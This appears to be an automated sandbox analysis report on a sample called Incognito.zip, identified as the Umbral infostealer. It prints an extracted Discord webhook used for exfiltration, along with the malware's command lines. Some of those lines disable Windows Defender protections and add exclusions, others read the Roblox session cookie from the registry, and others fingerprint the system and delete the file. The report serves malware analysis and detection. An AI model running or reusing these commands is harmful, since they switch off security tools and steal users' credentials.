Analysis
-
max time kernel
42s -
max time network
42s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 09:45
Static task
static1
Behavioral task
behavioral1
Sample
Incognito.zip
Resource
win7-20231129-en
General
-
Target
Incognito.zip
-
Size
7.1MB
-
MD5
63079240b3eed6b027bb65232fbf7af9
-
SHA1
1c8057ed47c33c14ab2ac71fa14641521314440f
-
SHA256
68293945c7f39f2c0236366498465ea4fdabf6c153c9340fa6279de1ce732e1f
-
SHA512
dd06e242c4761cf28e34ae91a5f07636be15f674834d79f138eb03b804969dafa81ea89252915fbb88669f9bb09bd4788b902328c80bc7551d4590f8ced4d428
-
SSDEEP
196608:Zsxld4g89iK+oEGmWzJi7N4m37u8gjPOng:ZsxlChiPoBmWy4m3Pcn
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1245803318895317014/MWwE2bIuC7nD9r88eA3hM6dJFmzWXC8puVXlopPKFnYnezNuslrP3rNwI0e88YuLAhwr
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x001000000001da74-6.dat family_umbral behavioral2/memory/2952-8-0x00000184C3EE0000-0x00000184C3F20000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4396 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Incognito.exe -
Executes dropped EXE 1 IoCs
pid Process 2952 Incognito.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 53 discord.com 54 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1848 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1952 PING.EXE -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 2952 Incognito.exe 2952 Incognito.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 4376 powershell.exe 4376 powershell.exe 4376 powershell.exe 2588 powershell.exe 2588 powershell.exe 2588 powershell.exe 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1952 7zG.exe Token: 35 1952 7zG.exe Token: SeSecurityPrivilege 1952 7zG.exe Token: SeSecurityPrivilege 1952 7zG.exe Token: SeDebugPrivilege 2952 Incognito.exe Token: SeIncreaseQuotaPrivilege 932 wmic.exe Token: SeSecurityPrivilege 932 wmic.exe Token: SeTakeOwnershipPrivilege 932 wmic.exe Token: SeLoadDriverPrivilege 932 wmic.exe Token: SeSystemProfilePrivilege 932 wmic.exe Token: SeSystemtimePrivilege 932 wmic.exe Token: SeProfSingleProcessPrivilege 932 wmic.exe Token: SeIncBasePriorityPrivilege 932 wmic.exe Token: SeCreatePagefilePrivilege 932 wmic.exe Token: SeBackupPrivilege 932 wmic.exe Token: SeRestorePrivilege 932 wmic.exe Token: SeShutdownPrivilege 932 wmic.exe Token: SeDebugPrivilege 932 wmic.exe Token: SeSystemEnvironmentPrivilege 932 wmic.exe Token: SeRemoteShutdownPrivilege 932 wmic.exe Token: SeUndockPrivilege 932 wmic.exe Token: SeManageVolumePrivilege 932 wmic.exe Token: 33 932 wmic.exe Token: 34 932 wmic.exe Token: 35 932 wmic.exe Token: 36 932 wmic.exe Token: SeIncreaseQuotaPrivilege 932 wmic.exe Token: SeSecurityPrivilege 932 wmic.exe Token: SeTakeOwnershipPrivilege 932 wmic.exe Token: SeLoadDriverPrivilege 932 wmic.exe Token: SeSystemProfilePrivilege 932 wmic.exe Token: SeSystemtimePrivilege 932 wmic.exe Token: SeProfSingleProcessPrivilege 932 wmic.exe Token: SeIncBasePriorityPrivilege 932 wmic.exe Token: SeCreatePagefilePrivilege 932 wmic.exe Token: SeBackupPrivilege 932 wmic.exe Token: SeRestorePrivilege 932 wmic.exe Token: SeShutdownPrivilege 932 wmic.exe Token: SeDebugPrivilege 932 wmic.exe Token: SeSystemEnvironmentPrivilege 932 wmic.exe Token: SeRemoteShutdownPrivilege 932 wmic.exe Token: SeUndockPrivilege 932 wmic.exe Token: SeManageVolumePrivilege 932 wmic.exe Token: 33 932 wmic.exe Token: 34 932 wmic.exe Token: 35 932 wmic.exe Token: 36 932 wmic.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 4376 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeIncreaseQuotaPrivilege 3860 wmic.exe Token: SeSecurityPrivilege 3860 wmic.exe Token: SeTakeOwnershipPrivilege 3860 wmic.exe Token: SeLoadDriverPrivilege 3860 wmic.exe Token: SeSystemProfilePrivilege 3860 wmic.exe Token: SeSystemtimePrivilege 3860 wmic.exe Token: SeProfSingleProcessPrivilege 3860 wmic.exe Token: SeIncBasePriorityPrivilege 3860 wmic.exe Token: SeCreatePagefilePrivilege 3860 wmic.exe Token: SeBackupPrivilege 3860 wmic.exe Token: SeRestorePrivilege 3860 wmic.exe Token: SeShutdownPrivilege 3860 wmic.exe Token: SeDebugPrivilege 3860 wmic.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1952 7zG.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 2952 wrote to memory of 932 2952 Incognito.exe 108 PID 2952 wrote to memory of 932 2952 Incognito.exe 108 PID 2952 wrote to memory of 4740 2952 Incognito.exe 110 PID 2952 wrote to memory of 4740 2952 Incognito.exe 110 PID 2952 wrote to memory of 4396 2952 Incognito.exe 112 PID 2952 wrote to memory of 4396 2952 Incognito.exe 112 PID 2952 wrote to memory of 3708 2952 Incognito.exe 114 PID 2952 wrote to memory of 3708 2952 Incognito.exe 114 PID 2952 wrote to memory of 4376 2952 Incognito.exe 116 PID 2952 wrote to memory of 4376 2952 Incognito.exe 116 PID 2952 wrote to memory of 2588 2952 Incognito.exe 118 PID 2952 wrote to memory of 2588 2952 Incognito.exe 118 PID 2952 wrote to memory of 3860 2952 Incognito.exe 120 PID 2952 wrote to memory of 3860 2952 Incognito.exe 120 PID 2952 wrote to memory of 3568 2952 Incognito.exe 122 PID 2952 wrote to memory of 3568 2952 Incognito.exe 122 PID 2952 wrote to memory of 3280 2952 Incognito.exe 124 PID 2952 wrote to memory of 3280 2952 Incognito.exe 124 PID 2952 wrote to memory of 4020 2952 Incognito.exe 126 PID 2952 wrote to memory of 4020 2952 Incognito.exe 126 PID 2952 wrote to memory of 1848 2952 Incognito.exe 128 PID 2952 wrote to memory of 1848 2952 Incognito.exe 128 PID 2952 wrote to memory of 2140 2952 Incognito.exe 130 PID 2952 wrote to memory of 2140 2952 Incognito.exe 130 PID 2140 wrote to memory of 1952 2140 cmd.exe 132 PID 2140 wrote to memory of 1952 2140 cmd.exe 132 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4740 attrib.exe
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Incognito.zip1⤵PID:4244
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3368
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Incognito\" -spe -an -ai#7zMap24584:98:7zEvent308731⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1952
-
C:\Users\Admin\AppData\Local\Temp\Incognito\incognito1\if it doesn't start\Incognito.exe"C:\Users\Admin\AppData\Local\Temp\Incognito\incognito1\if it doesn't start\Incognito.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Incognito\incognito1\if it doesn't start\Incognito.exe"2⤵
- Views/modifies file attributes
PID:4740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Incognito\incognito1\if it doesn't start\Incognito.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:3568
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:3280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4020
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1848
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Incognito\incognito1\if it doesn't start\Incognito.exe" && pause2⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:1952
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
Filesize
948B
MD55824a6037c081fda5d46de274b6e2799
SHA1526367a09300cbde430e8fb44e41cbe7a0937aac
SHA2564d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f
SHA512a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD50b7b86c78503d141d03085ec198d29fc
SHA158cd7d5aabf4dc6709ffa95f10d37f5863d21b7a
SHA25608c7ee9773c57a061a00010f11ae7c6d64a63fc0076d14d8a438fc96aee8b561
SHA512a99e6426695de6e076738f25b4b2ab206bd03893af91e290d4ab32e95afbaf1dbeb0fbe4a4d1a2e564e4a95a169452ceb3117a88936057658fd38382b93eb0f2
-
Filesize
231KB
MD537034982dc566783fd574fb3e2c60a2a
SHA18f697451b5894b2d6c79fd7a52c6e58a48e28f74
SHA256d9bd2f789078851ad54d6be09e73f8d1d707484adc45f1010fcf43a6bce88fe4
SHA5127429d21f96158b7fa385685fde010fdb505b1aec84d1b0e0ff042377f8266afb8d656e0349727d41a904dd3a4f548bf9905b18a7c7ce319d3cce406ec76f1418
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82